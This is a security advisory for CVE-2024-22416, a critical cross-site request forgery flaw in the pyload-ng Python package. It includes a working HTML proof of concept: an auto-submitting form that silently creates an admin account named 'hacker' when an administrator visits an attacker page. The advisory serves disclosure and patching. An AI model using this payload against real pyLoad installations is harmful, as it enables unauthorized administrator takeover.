CVE-2024-22416 – pyload-ng

Package

Manager: pip
Name: pyload-ng
Vulnerable Version: >=0 <0.5.0b3.dev78

Severity

Level: Critical

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

EPSS: 0.05898 pctl0.90238

Details

Cross-Site Request Forgery on any API call in pyLoad may lead to admin privilege escalation ### Summary The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. This proof of concept shows how an unauthenticated user could trick the administrator's browser into creating a new admin user. ### PoC We host the following HTML file on an attacker-controlled server. ```html <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="http://localhost:8000/api/add_user/%22hacker%22,%22hacker%22"> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> ``` If we now trick an administrator into visiting our malicious page at `https://attacker.com/CSRF.html`, we see that their browser will make a request to `/api/add_user/%22hacker%22,%22hacker%22`, adding a new administrator to the `pyload` application.  The attacker can now authenticate as this newly created administrator user with the username `hacker` and password `hacker`.  ### Impact Any API call can be made via a CSRF attack by an unauthenticated user.

Metadata

Created: 2024-01-19T15:27:12Z
Modified: 2024-10-21T21:06:20Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-pgpj-v85q-h5fm/GHSA-pgpj-v85q-h5fm.json
CWE IDs: ["CWE-352"]
Alternative ID: GHSA-pgpj-v85q-h5fm
Finding: F007
Auto approve: 1